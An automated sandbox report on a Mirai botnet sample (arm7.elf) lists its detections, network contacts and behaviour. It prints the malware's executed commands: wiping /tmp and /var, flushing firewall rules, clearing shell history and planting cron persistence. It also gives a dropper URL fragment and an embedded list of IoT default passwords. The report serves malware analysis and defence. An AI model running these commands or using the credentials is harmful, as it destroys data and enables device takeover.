Linux Analysis Report
arm7.elf

Overview

General Information

Sample name: arm7.elf
Analysis ID: 1526773
MD5: c385a6903bce7de281b461464b9defa1
SHA1: 3a122e2033afa11b6ab684f3e66fe3ba49ae2cfa
SHA256: 85e15cc2fe331c89500ea2f7308b8006e5aa2745394ba915f1b369fbe5001d2a
Tags: user-elfdigest
Infos:

Detection

Mirai
Score: 84
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Executes the "iptables" command to insert, remove and/or manipulate rules
Manipulation of devices in /dev
Sample deletes itself
Sample tries to persist itself using cron
Tries to stop the "iptables" service
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "rm" command used to delete files or directories
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads CPU information from /sys indicative of miner or evasive malware
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample listens on a socket
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Writes shell script file to disk with an unusual file extension

Classification

Name Description Attribution Blogpost URLs Link
Mirai Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: arm7.elf Avira: detected
Multi AV Scanner detection for submitted file
Source: arm7.elf ReversingLabs: Detection: 50%
Source: arm7.elf Virustotal: Detection: 38% Perma Link
Reads CPU information from /sys indicative of miner or evasive malware
Source: /usr/bin/pkill (PID: 5452) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5466) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior
Source: /usr/bin/pkill (PID: 5471) Reads CPU info from /sys: /sys/devices/system/cpu/online Jump to behavior

Networking
barindex
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 5621) Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5576) Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Tries to stop the "iptables" service
Source: /usr/sbin/service (PID: 5474) Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.service Jump to behavior
Source: /usr/sbin/service (PID: 5474) Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.service Jump to behavior
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.13:40720 -> 212.118.43.167:2222
Source: global traffic TCP traffic: 192.168.2.13:43652 -> 156.238.224.214:8443
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 5446) Iptables executable: /usr/sbin/iptables -> iptables -F Jump to behavior
Source: /bin/sh (PID: 5484) Iptables executable: /sbin/iptables -> /sbin/iptables -F Jump to behavior
Source: /bin/sh (PID: 5485) Iptables executable: /sbin/iptables -> /sbin/iptables -X Jump to behavior
Source: /bin/sh (PID: 5621) Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5576) Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Sample listens on a socket
Source: /tmp/arm7.elf (PID: 5433) Socket: 127.0.0.1:8013 Jump to behavior
Source: /tmp/arm7.elf (PID: 5545) Socket: 0.0.0.0:31337 Jump to behavior
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Source: global traffic TCP traffic: 192.168.2.13:48202 -> 185.125.190.26:443
Source: unknown TCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknown TCP traffic detected without corresponding DNS query: 212.118.43.167
Source: unknown TCP traffic detected without corresponding DNS query: 212.118.43.167
Source: unknown TCP traffic detected without corresponding DNS query: 212.118.43.167
Source: unknown TCP traffic detected without corresponding DNS query: 212.118.43.167
Source: unknown TCP traffic detected without corresponding DNS query: 185.125.190.26
Source: unknown TCP traffic detected without corresponding DNS query: 212.118.43.167
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 51.77.149.139
Source: unknown UDP traffic detected without corresponding DNS query: 194.36.144.87
Source: unknown UDP traffic detected without corresponding DNS query: 134.195.4.2
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknown UDP traffic detected without corresponding DNS query: 178.254.22.166
Source: global traffic DNS traffic detected: DNS query: octopus1337.geek
Source: arm7.elf String found in binary or memory: http://Change_ip/octopus_re.sh;chmod
Source: unknown Network traffic detected: HTTP traffic on port 48202 -> 443
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: pkill -9 busybox
Source: Initial sample String containing 'busybox' found: armrm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmprm -rf /tmp/*iptables -Fpkill -9 busyboxpkill -9 perlpkill -9 pythonservice iptables stop/sbin/iptables -F; /sbin/iptables -Xservice firewall stophistory -crm -rf ~/.bash_historyhistory -w0.0.0.0
Source: Initial sample String containing 'busybox' found: /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
Source: Initial sample String containing 'busybox' found: busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
Source: Initial sample String containing 'busybox' found: systemctl daemon-reload;systemctl enable nginnx.service;systemctl start nginnx.service;sh -c systemctl daemon-reload;systemctl enable nginnxsshd%x/dev/watchdog/dev/misc/watchdogwatchdogrootPon521Zte521root621vizxvoelinux123wabjtamZxic521tsgoingon123456xc3511solokeydefaulta1sev5y7c39khkipc2016unisheenFireituphslwificam5upjvbzd1001chinsystemzlxx.admin7ujMko0vizxv1234horsesantslqxc12345xmhdipcicatch99founder88xirtamtaZz@01/*6.=_ja12345t0talc0ntr0l4!7ujMko0admintelecomadminipcam_rt5350juantech1234dreamboxIPCam@swzhongxinghi3518hg2x0dropperipc71aroot123telnetipcamgrouterGM8182200808263ep5w2uadmin123admin1234admin@123BrAhMoS@15GeNeXiS@19firetide2601hxservicepasswordsupportadmintelnetadminadmintelecomguestftpusernobodydaemon1cDuLJ7ctlJwpbo6S2fGqNFsOxhlwSG8lJwpbo6tluafedbinvstarcam201520150602supporthikvisione8ehomeasbe8ehomee8telnetciscosetsockoptbindlisten1.1.1.1hi im here, i think/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPTbusybox iptables -
Source: classification engine Classification label: mal84.troj.evad.linELF@0/2@35/0

Data Obfuscation
barindex
Manipulation of devices in /dev
Source: /tmp/arm7.elf (PID: 5529) Written: /dev/ocmount Jump to behavior

Persistence and Installation Behavior
barindex
Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 5621) Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5576) Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Sample tries to persist itself using cron
Source: /bin/sh (PID: 5535) File: /etc/cron.d/mount.sh Jump to behavior
Tries to stop the "iptables" service
Source: /usr/sbin/service (PID: 5474) Systemctl executable stopping iptables: /usr/sbin/systemctl -> systemctl stop iptables.service Jump to behavior
Source: /usr/sbin/service (PID: 5474) Systemctl executable stopping iptables: /usr/bin/systemctl -> systemctl stop iptables.service Jump to behavior
Creates hidden files and/or directories
Source: /usr/bin/rm (PID: 5437) Directory: /var/lib/php/.. Jump to behavior
Source: /usr/bin/rm (PID: 5437) Directory: /var/lib/gdm3/.cache Jump to behavior
Source: /usr/bin/rm (PID: 5437) Directory: /var/lib/gdm3/.cache Jump to behavior
Source: /usr/bin/rm (PID: 5437) Directory: /var/lib/gdm3/.config Jump to behavior
Source: /usr/bin/rm (PID: 5437) Directory: /var/lib/gdm3/.config Jump to behavior
Source: /usr/bin/rm (PID: 5437) Directory: /var/lib/gdm3/.local Jump to behavior
Source: /usr/bin/rm (PID: 5437) Directory: /var/lib/gdm3/.local Jump to behavior
Source: /usr/bin/rm (PID: 5437) Directory: /var/lib/snapd/assertions/asserts-v0/.. Jump to behavior
Source: /usr/bin/rm (PID: 5437) Directory: /var/lib/snapd/assertions/.. Jump to behavior
Source: /usr/bin/rm (PID: 5437) Directory: /var/lib/snapd/.. Jump to behavior
Source: /usr/bin/rm (PID: 5437) Directory: /var/lib/colord/.cache Jump to behavior
Source: /usr/bin/rm (PID: 5437) Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wants Jump to behavior
Source: /usr/bin/rm (PID: 5437) Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wants Jump to behavior
Enumerates processes within the "proc" file system
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/230/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/230/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/110/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/110/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/231/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/231/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/111/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/111/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/232/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/232/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/112/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/112/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/233/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/233/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/113/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/113/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/234/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/234/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/114/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/114/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/235/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/235/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/115/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/115/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/236/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/236/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/116/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/116/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/237/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/237/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/117/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/117/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/238/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/238/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/118/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/118/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/239/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/239/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/119/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/119/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/3633/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/3633/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/914/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/914/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/10/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/10/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/917/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/917/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/11/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/11/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/12/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/12/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/5273/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/5273/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/13/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/13/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/14/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/14/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/15/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/15/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/16/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/16/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/17/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/17/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/18/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/18/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/19/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/19/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/240/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/240/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/3095/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/3095/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/120/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/120/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/241/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/241/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/121/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/121/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/242/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/242/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/1/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/1/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/122/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/122/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/243/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/243/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/2/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/2/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/123/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/123/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/244/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/244/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/3/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/3/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/124/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/124/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/245/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/245/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/1588/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/1588/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/125/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/125/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/4/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/4/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/246/status Jump to behavior
Source: /usr/bin/pkill (PID: 5471) File opened: /proc/246/cmdline Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/arm7.elf (PID: 5435) Shell command executed: /bin/sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp" Jump to behavior
Source: /tmp/arm7.elf (PID: 5441) Shell command executed: /bin/sh -c "rm -rf /tmp/*" Jump to behavior
Source: /tmp/arm7.elf (PID: 5444) Shell command executed: /bin/sh -c "iptables -F" Jump to behavior
Source: /tmp/arm7.elf (PID: 5450) Shell command executed: /bin/sh -c "pkill -9 busybox" Jump to behavior
Source: /tmp/arm7.elf (PID: 5464) Shell command executed: /bin/sh -c "pkill -9 perl" Jump to behavior
Source: /tmp/arm7.elf (PID: 5469) Shell command executed: /bin/sh -c "pkill -9 python" Jump to behavior
Source: /tmp/arm7.elf (PID: 5472) Shell command executed: /bin/sh -c "service iptables stop" Jump to behavior
Source: /tmp/arm7.elf (PID: 5482) Shell command executed: /bin/sh -c "/sbin/iptables -F; /sbin/iptables -X" Jump to behavior
Source: /tmp/arm7.elf (PID: 5486) Shell command executed: /bin/sh -c "service firewall stop" Jump to behavior
Source: /tmp/arm7.elf (PID: 5517) Shell command executed: /bin/sh -c "history -c" Jump to behavior
Source: /tmp/arm7.elf (PID: 5519) Shell command executed: /bin/sh -c "rm -rf ~/.bash_history" Jump to behavior
Source: /tmp/arm7.elf (PID: 5522) Shell command executed: /bin/sh -c "history -w" Jump to behavior
Source: /tmp/arm7.elf (PID: 5532) Shell command executed: /bin/sh -c "chmod +x /dev/ocmount" Jump to behavior
Source: /tmp/arm7.elf (PID: 5535) Shell command executed: /bin/sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh" Jump to behavior
Source: /tmp/arm7.elf (PID: 5537) Shell command executed: /bin/sh -c /dev/ocmount Jump to behavior
Source: /tmp/arm7.elf (PID: 5592) Shell command executed: /bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm7.elf (PID: 5639) Shell command executed: /bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm7.elf (PID: 5645) Shell command executed: /bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm7.elf (PID: 5652) Shell command executed: /bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm7.elf (PID: 5658) Shell command executed: /bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm7.elf (PID: 5548) Shell command executed: /bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm7.elf (PID: 5637) Shell command executed: /bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm7.elf (PID: 5643) Shell command executed: /bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm7.elf (PID: 5648) Shell command executed: /bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Source: /tmp/arm7.elf (PID: 5654) Shell command executed: /bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" Jump to behavior
Executes the "chmod" command used to modify permissions
Source: /bin/sh (PID: 5534) Chmod executable: /usr/bin/chmod -> chmod +x /dev/ocmount Jump to behavior
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 5446) Iptables executable: /usr/sbin/iptables -> iptables -F Jump to behavior
Source: /bin/sh (PID: 5484) Iptables executable: /sbin/iptables -> /sbin/iptables -F Jump to behavior
Source: /bin/sh (PID: 5485) Iptables executable: /sbin/iptables -> /sbin/iptables -X Jump to behavior
Source: /bin/sh (PID: 5621) Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Source: /bin/sh (PID: 5576) Iptables executable: /usr/sbin/iptables -> iptables -A INPUT -p tcp --dport 26721 -j ACCEPT Jump to behavior
Executes the "kill" or "pkill" command typically used to terminate processes
Source: /bin/sh (PID: 5452) Pkill executable: /usr/bin/pkill -> pkill -9 busybox Jump to behavior
Source: /bin/sh (PID: 5466) Pkill executable: /usr/bin/pkill -> pkill -9 perl Jump to behavior
Source: /bin/sh (PID: 5471) Pkill executable: /usr/bin/pkill -> pkill -9 python Jump to behavior
Executes the "rm" command used to delete files or directories
Source: /bin/sh (PID: 5437) Rm executable: /usr/bin/rm -> rm -rf /tmp/arm7.elf /tmp/config-err-IN1GlB /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap-private-tmp /tmp/snap.lxd /tmp/ssh-ntFb5z3TQVeu /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rehHTg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-rnzw4f /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-jxKacf /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-WfFmsi /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-9mYjrg /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-Ylvv8i /tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-VKEayg /tmp/vmware-root_727-4290690966 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-ModemManager.service-rJRv0g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-2NWDdf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-WNhjUf /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-switcheroo-control.service-YlFEtg /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-logind.service-VhFl6g /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-resolved.service-GDC7pj /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-systemd-timedated.service-NgTmVe /var/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-upower.service-FqJmSi /var/log/wtmp Jump to behavior
Source: /bin/sh (PID: 5443) Rm executable: /usr/bin/rm -> rm -rf /tmp/* Jump to behavior
Source: /bin/sh (PID: 5521) Rm executable: /usr/bin/rm -> rm -rf /root/.bash_history Jump to behavior
Executes the "systemctl" command used for controlling the systemd system and service manager
Source: /usr/sbin/service (PID: 5474) Systemctl executable: /usr/bin/systemctl -> systemctl stop iptables.service Jump to behavior
Source: /usr/sbin/service (PID: 5477) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target Jump to behavior
Source: /usr/sbin/service (PID: 5479) Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket Jump to behavior
Source: /usr/sbin/service (PID: 5488) Systemctl executable: /usr/bin/systemctl -> systemctl stop firewall.service Jump to behavior
Source: /usr/sbin/service (PID: 5491) Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.target Jump to behavior
Source: /usr/sbin/service (PID: 5493) Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socket Jump to behavior
Reads system information from the proc file system
Source: /tmp/arm7.elf (PID: 5597) Reads from proc file: /proc/stat Jump to behavior
Source: /tmp/arm7.elf (PID: 5553) Reads from proc file: /proc/stat Jump to behavior
Sample tries to set the executable flag
Source: /usr/bin/chmod (PID: 5534) File: /dev/ocmount (bits: - usr: rx grp: rx all: rwx) Jump to behavior
Writes crontab like entries to files to /var or /etc typically for achieving persistence
Source: /bin/sh (PID: 5535) Crontab like entry written: /etc/cron.d/mount.sh Jump to dropped file
Writes shell script file to disk with an unusual file extension
Source: /tmp/arm7.elf (PID: 5529) Writes shell script file to disk with an unusual file extension: /dev/ocmount Jump to dropped file
Source: /usr/sbin/service (PID: 5480) Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p Jump to behavior
Source: /usr/sbin/service (PID: 5494) Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p Jump to behavior
